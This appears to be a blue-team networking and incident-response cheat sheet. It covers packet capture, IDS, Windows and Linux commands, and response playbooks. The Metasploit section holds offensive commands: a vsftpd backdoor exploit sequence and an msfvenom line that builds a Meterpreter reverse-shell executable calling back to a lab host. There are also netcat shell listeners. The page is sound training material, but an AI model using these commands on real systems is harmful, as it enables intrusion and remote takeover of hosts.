Networking Blue Team Tools
Networking / Blue Team Tools Overview
Theory
Blue Team focuses on defending networks, systems, and data from cyberattacks.
Tools are used for monitoring traffic, detecting intrusions, and logging network events.
Emphasis is on visibility, detection, and incident response.
Practical
Setup: Use a virtual lab with Kali Linux (Attacker), Ubuntu/Windows (Victim), and Security Onion (Monitoring).
Common Blue Team tools: Wireshark, tcpdump, Snort, Bro (Zeek), ARGUS, TShark, Scapy, etc.
Common Ports
Theory
Common ports:
20/21 (FTP), 22 (SSH), 23 (Telnet), 25 (SMTP), 53 (DNS), 80 (HTTP), 110 (POP3), 443 (HTTPS), 445 (SMB), 3389 (RDP)
TCP vs UDP: TCP is connection-oriented; UDP is faster but unreliable.
Practical
sudo netstat -tulnp # List listening ports
sudo lsof -i # Show open ports
nmap -sT localhost # Scan local machine portsIPv4 / TCP / UDP / ICMP Headers, Subnetting
Theory
IPv4 Header: Version, IHL, Type of Service, Total Length, etc.
TCP Header: Source port, Destination port, Flags (SYN, ACK, etc.)
UDP Header: Simpler, with Source/Dest Port, Length, Checksum
ICMP: Echo request/reply (used in ping)
Subnetting: Divides networks; use CIDR notation (e.g., 192.168.1.0/24)
Practical
Use Wireshark to inspect TCP/UDP headers.
ping -c 3 8.8.8.8
ipcalc 192.168.1.0/24IPv6 / TCP Header
Theory
IPv6: 128-bit addresses, no NAT, simplified headers.
TCP header remains the same as in IPv4.
Practical
ping6 ipv6.google.comOSI Model
Theory
Physical
Data Link
Network
Transport
Session
Presentation
Application
TCP/IP maps to OSI (4 layers).
Practical
Use Wireshark to view data flowing through layers (e.g., Application layer: HTTP)
HTTP, FTP, Decimal to Hex Conversion
Theory
HTTP: Used for web, uses port 80.
FTP: Transfers files, ports 20/21.
Hex: Base-16, common in packet data.
Practical
Use Wireshark and analyze HTTP GET/POST headers.
curl http://example.com
ftp ftp.gnu.org
echo $((16#1F)) # Hex to decimal20 Critical Security Controls
Theory
Developed by CIS (Center for Internet Security).
Includes controls like Inventory, Secure Configurations, Logging, Email Protection, etc.
Practical
Use OpenVAS/Nessus to assess systems.
Use auditd or OSSEC to implement monitoring controls.
Cisco Networking All in One Reference
Theory
Includes Switching, Routing, VLANs, ACLs, NAT, VPNs, etc.
Cisco IOS basics:
show ip int brief,conf t,int g0/1, etc.
Practical
Use Cisco Packet Tracer:
Configure VLANs, ACLs
Setup routing with OSPF or EIGRP
conf t
interface g0/1
ip address 192.168.1.1 255.255.255.0
no shutMisc Tools / Cheat Sheets
Theory
Misc tools refer to a wide variety of utilities used for reconnaissance, enumeration, exploitation, and troubleshooting.
Cheat sheets summarize syntax, options, and commands for rapid use — great for high-pressure situations like CTFs or incident response.
Common Cheat Sheets:
GTFOBins (for Linux privilege escalation)
Practical Tips:
Keep cheat sheets in markdown or PDF in your lab.
Use tools like
tldr(a simplified man page tool) or create aliases:
tldr curl
alias grabip="ip addr | grep inet"ARGUS / TCPDUMP / TSHARK / NGREP
Theory
ARGUS: Real-time traffic flow monitoring.
tcpdump: Command-line packet capture.
tshark: Wireshark CLI.
ngrep: grep-like tool for network traffic.
Practical
tcpdump -i eth0 port 80
tshark -i eth0 -Y "http.request"
ngrep -d eth0 "password" port 80Tcpdump
Theory
Captures raw packets from interface.
Filters with BPF syntax.
Practical
sudo tcpdump -i eth0 -nn -X
sudo tcpdump -i eth0 'tcp[tcpflags] & tcp-syn != 0'Berkeley Packet Filters and Bit Masking
Theory
BPF is used in tools like tcpdump.
Syntax allows granular filtering using logic and masks.
Practical
tcpdump 'ip[6:2] & 0x1fff = 0' # Filter non-fragmented packetsWireshark
Theory
GUI tool for packet analysis.
Filters:
http.request,ip.addr == 192.168.1.1
Practical
Capture traffic.
Analyze TCP streams.
Use coloring rules and protocol hierarchies.
Nmap
Theory
Port scanner and host discovery tool.
Supports OS detection, versioning, script scanning.
Practical
nmap -sS -A 192.168.1.1
nmap --script vuln 192.168.1.1Google Hacking (Google Dorking)
Theory
Uses special search operators to find vulnerable information indexed by Google.
Common operators:
intitle:,inurl:,filetype:,site:,cache:,intext:
Used to find login pages, error messages, exposed documents, etc.
Examples
Practical
Use Google safely — avoid targeting without permission.
Combine with
theHarvesterfor automated data collection.
Python Quick Reference
Theory
Used for scripting analysis tools and automation.
Practical
import socket
print(socket.gethostbyname('google.com'))Regular Expressions
Theory
Pattern matching, used in log parsing, packet inspection.
grep -E 'Failed password|Invalid user' /var/log/auth.logPractical
In Python:
import re
re.findall(r'\d+\.\d+\.\d+\.\d+', 'Failed login from 192.168.1.1')SNORT
Theory
Signature-based Intrusion Detection System.
Practical
Write a simple rule:
snort -i eth0 -c /etc/snort/snort.conf -A consolealert tcp any any -> any 80 (msg:"HTTP detected"; sid:1000001;)rwfilter (SiLK)
Theory
Flow analysis tool from CERT NetSA suite.
Practical
rwfilter --start-date=2025/06/01 --type=in --proto=6 --pass=stdout | rwcutScapy
Theory
Python-based packet crafting tool.
Practical
from scapy.all import *
packet = IP(dst="1.1.1.1")/ICMP()
send(packet)Bro (Zeek)
Theory
Network Security Monitor for traffic analysis and logging.
Powerful scripting engine.
Practical
zeek -r traffic.pcap
cat conn.logNetcat
Theory
Called the Swiss Army Knife of networking.
Can be used for:
Port scanning
Banner grabbing
Reverse/backconnect shells
File transfer
TCP/UDP client/server
Practical
# Listen on port 4444
nc -lvnp 4444
# Connect to remote host
nc 192.168.1.10 4444
# Transfer file
# Sender
nc -lvnp 5555 < file.txt
# Receiver
nc 192.168.1.10 5555 > file.txt
# Banner grabbing
nc -nv 192.168.1.1 80
GET / HTTP/1.1Hping
Theory
A network tool like ping but more customizable.
Can send custom TCP/UDP/ICMP packets.
Used for firewall testing, port scanning, DoS simulation, and traceroute.
Practical
# Basic ping (like ICMP ping)
hping3 -1 192.168.1.1
# TCP SYN scan on port 80
hping3 -S -p 80 192.168.1.1
# Traceroute-like scan
hping3 -S -p 80 --traceroute 192.168.1.1
# UDP Scan
hping3 --udp -p 53 -c 1 192.168.1.1Metasploit Framework
Theory
Penetration testing framework with hundreds of exploits, payloads, and auxiliary modules.
Used for vulnerability verification, post-exploitation, payload delivery, and pivoting.
Components:
msfconsole: Main CLI interface.Modules:
Exploit
Auxiliary
Payloads
Encoders
Post
msfconsole
# Search exploit
search vsftpd
# Use exploit
use exploit/unix/ftp/vsftpd_234_backdoor
# Set options
set RHOSTS 192.168.1.10
set LHOST 192.168.1.5
set PAYLOAD cmd/unix/interact
runPractical
Other uses:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f exe > shell.exeOptional Tools to Combine With:
| Tool | Purpose |
|---|---|
| theHarvester | Email and subdomain enumeration |
| dnsenum | DNS info gathering |
| Enum4linux | SMB info and share enum |
| Nikto | Web server vulnerability scanner |
| Hydra | Brute-force for SSH, FTP, HTTP etc. |
WINDOWS SECTION
Useful Windows Commands, Reg, Netsh, Netstat, Loops
Theory
These commands are essential for administration, diagnostics, and security operations on Windows systems.
Practical
:: System Info & User Info
systeminfo
whoami
hostname
:: Registry Operations
reg query HKLM\Software
reg add HKCU\Software\Test /v Flag /t REG_SZ /d YES /f
:: Network Config & Firewall
netsh interface ipv4 show interfaces
netsh advfirewall firewall show rule name=all
:: Port and Connection Monitoring
netstat -ano
tasklist /fi "PID eq 1234"
:: For Loops in Batch
for /L %%G in (1,1,5) do echo %%GIntrusion Detection Cheat Sheets
Theory
Used to recognize suspicious or malicious behaviors based on logs, memory, or network events. Good for SIEM and SOC analysts.
Common Cheat Sheets:
MITRE ATT&CK
Windows Log Event Cheat Sheet
Sysmon Event ID Reference
Sigma Rule Templates
Practical
Use them to write:
YARA rules
Sigma rules
Correlate events in ELK or Splunk:
index=winlogbeat EventID=4625Windows Incident Response
Theory
Steps taken during or after a compromise to identify, contain, and eradicate malicious activity.
Practical
# 1. Identify current users & logon sessions
query user
whoami /groups
# 2. Review recent system and security logs
wevtutil qe Security "/q:*[System[(EventID=4624)]]" /f:text /c:5
# 3. Check for persistence mechanisms
dir "C:\Users\*\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
schtasks /query /fo LIST
# 4. Investigate network and running processes
netstat -ano
tasklistWindows Security Log Event IDs
Theory
Security event logs reveal auth attempts, privilege use, process creation, etc.
Important Event IDs:
| Event ID | Meaning |
|---|---|
| 4624 | Successful logon |
| 4625 | Failed logon |
| 4688 | New process created |
| 4672 | Special privileges assigned |
| 4648 | Logon with explicit credentials |
Practical
Use Windows Event Viewer or PowerShell to parse logs:
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4624} | Format-ListPowerShell
Theory
PowerShell is a powerful automation and post-exploitation tool used for both Blue and Red teams.
Practical
# List services
Get-Service
# List processes
Get-Process
# Remote session
Enter-PSSession -ComputerName 192.168.1.10
# Get users from AD (if in domain)
Get-ADUser -Filter *
# Script a loop
foreach ($i in 1..5) { Write-Host "Value: $i" }LINUX / UNIX SECTION
Linux Hardening
Theory
Reducing attack surface and increasing auditing/monitoring.
Key Steps:
Disable unused services
Use strong file permissions
Configure auditd, fail2ban
Enforce password policies
Enable AppArmor/SELinux
Practical
systemctl disable telnet
chmod 700 ~/.ssh
ufw enable
chage -l usernameBasic Linux Commands
Theory
Essential for administration, scripting, security.
Practical
ps aux # running processes
top / htop # interactive monitoring
df -h # disk usage
netstat -tuln # open ports
grep "error" /var/log/syslogSSH Forwarding
Theory
Used for tunneling traffic securely.
Practical
# Local port forwarding
ssh -L 8080:internal.server:80 user@jumpbox
# Remote port forwarding
ssh -R 9000:localhost:22 user@remotehostIptables
Theory
Powerful packet filtering/firewall tool.
Practical
# Allow HTTP
iptables -A INPUT -p tcp --dport 80 -j ACCEPT
# Drop all other inbound
iptables -P INPUT DROP
# List rules
iptables -L -n -vSearching Through Files
Theory
Find strings, patterns, or files for forensics or log parsing.
Practical
grep -i "error" /var/log/syslog
find / -name "*.log"
awk '{print $1,$5}' /var/log/syslog
cut -d':' -f2 /etc/passwdCron
Theory
Used for scheduling periodic tasks (including malware persistence!).
Practical
crontab -l
crontab -e
# Example: Run script every day at 5pm
0 17 * * * /home/user/backup.shVI Editor
Theory
A classic text editor available on almost all Unix systems.
Practical
vi file.txt
# i -> insert mode
# esc -> back to command
# :w -> write
# :q! -> quit without savingREMnux / Reverse Engineer Malware
Theory
REMnux is a Linux distro for malware analysis.
Includes tools like:
Ghidra: Static code analysis
Radare2: Binary analysis
Volatility: Memory forensics
Cutter: GUI for radare2
ApkTool, PEStudio, etc.
Practical Steps
Unpack Malware
upx -d malware.exeCheck Strings
strings malware.exe | lessInspect with Static Analyzers
Run in Ghidra: Inspect functions and entry points.
Use
peframeorexiftoolfor metadata.
Dynamic Analysis
Run malware in REMnux + INetSim
Monitor behavior with Wireshark and Procmon (on Windows)
Incident Response / Playbook Per Situation
Theory
Incident Response (IR) involves a structured approach to handling security breaches:
Preparation
Identification
Containment
Eradication
Recovery
Lessons Learned
Playbooks are step-by-step response guides tailored to specific incident types.
Worm Infection Response
Theory
Worms spread automatically across systems/networks without human interaction.
Key signs: Unusual network traffic, sudden disk usage, CPU spikes, rapid spread.
Practical
Identify infected hosts via logs:
Containment: Isolate machine from the network.
Eradication:
Scan with antivirus (
Windows Defender,ClamAV)Remove registry entries and startup scripts
Recovery:
Patch OS
Reimage if needed
last | grep <suspicious user>
netstat -an | grep :135 # Look for SMB trafficWindows Malware Detection
Theory
Look for indicators like:
Suspicious processes (e.g.
svchost.exein the wrong path)Unknown startup entries
Unusual registry keys
Practical
Get-Process | Where-Object { $_.Path -notlike "C:\Windows\*" }
# Check autoruns
autoruns64.exe
# Scan with Windows Defender
Start-MpScan -ScanType FullScanWindows Intrusion Detection
Theory
Detect via logs (Event Viewer), changes in services, and behavioral signs.
Practical
Use Sysmon + ELK for detailed tracking.
Get-WinEvent -LogName Security | Where-Object {$_.Id -eq 4625} # Failed logons
# Suspicious accounts
net user /domainWebsite Defacement
Theory
Visual signs of tampering.
May be caused by:
SQL injection
RFI/LFI
Admin panel brute-force
Practical
Identify via:
Check logs:
Contain:
Take down site if needed
Backup files
Restore from backup + patch vulnerabilities
curl http://website.comtail -f /var/log/apache2/access.log
tail -f /var/log/apache2/error.logLinux/Unix Intrusion Detection
Theory
Look for new users, SUID binaries, netcat shells, or modified cron jobs.
Practical
Use auditd or AIDE for change detection.
# Check for new SUID binaries
find / -perm -4000 -type f 2>/dev/null
# Check for unknown users
cat /etc/passwd | tail
# Cron jobs
crontab -lMalicious Network Behavior
Theory
Includes scanning, lateral movement, data exfiltration.
Practical
Use Wireshark, Zeek, Suricata, or tcpdump to monitor traffic:
Detect beaconing:
Repeated outbound connections at exact intervals
Correlate with:
DNS logs
Proxy logs
tcpdump -nn -i eth0 port not 22DDoS Incident Response
Theory
DDoS = Distributed Denial of Service — floods service to make it unusable.
Practical
Identify via:
Firewall logs
NetFlow/sFlow
Web server access logs
Contain:
Geo-block or rate-limit using firewall/WAF:
Eradicate:
Contact ISP/CDN (Cloudflare, Akamai)
Recovery:
Implement DDoS protection mechanisms
iptables -A INPUT -s 1.2.3.4 -j DROPPhishing Incident Response
Theory
Phishing = fraudulent email to steal credentials or deliver malware.
Practical
Identify:
Forward email to analysis sandbox
Check header:
Contain:
Revoke credentials
Remove malicious emails via Exchange Admin Center or PowerShell:
Eradication:
Train users
Add domain to blacklist
cat email.eml | grep -i "Received"Search-Mailbox -Identity user -SearchQuery "Subject:'Invoice'" -DeleteContentIncident Response Forms
Theory
Standardized documents to record and communicate incidents:
Classification
Timeline
Systems impacted
Containment steps
Point of contact
Examples
IR Reporting Template (PDF or Word)
NIST 800-61 templates
Fields:
Description
Severity
Team involved
Remediation actions
Incident Communications Log
Theory
Chronological log of actions and communications for legal and audit purposes.
Practical
Create in Excel or Markdown:
Incident Contact List
Theory
Prepared list of individuals and teams to notify during IR.
Contents
SOC Analysts
IT admins
Legal counsel
PR/Comms team
CIRT lead
Incident Identification
Theory
Detect via:
Alerts (SIEM, IDS)
User-reported
Threat intel feeds
Unusual logs or system behavior
Practical
Use ELK stack or Splunk for real-time detection.
grep "Failed password" /var/log/auth.logIncident Containment
Theory
Prevent further damage and isolate the threat.
Practical
Disable user accounts
Block attacker IPs
Isolate machines
ufw deny from 203.0.113.99
shutdown nowIncident Eradication
Theory
Remove malware and fix the root cause.
Practical
Reimage system or restore from backup
Remove persistence mechanisms (cron, registry)
Patch exploited vulnerabilities
Incident Survey (Post-Incident Review)
Theory
Conduct after-action review and lessons learned.
Practical
Answer:
What was missed?
What could be improved?
Were detection and containment timely?
Update documentation and training
Social Engineering Incident Response
Theory
Attacker manipulates people to gain unauthorized access.
Practical
Interview staff involved.
Review logs to verify what was accessed.
Contain by resetting credentials.
Notify security team and affected users.
Launch awareness training.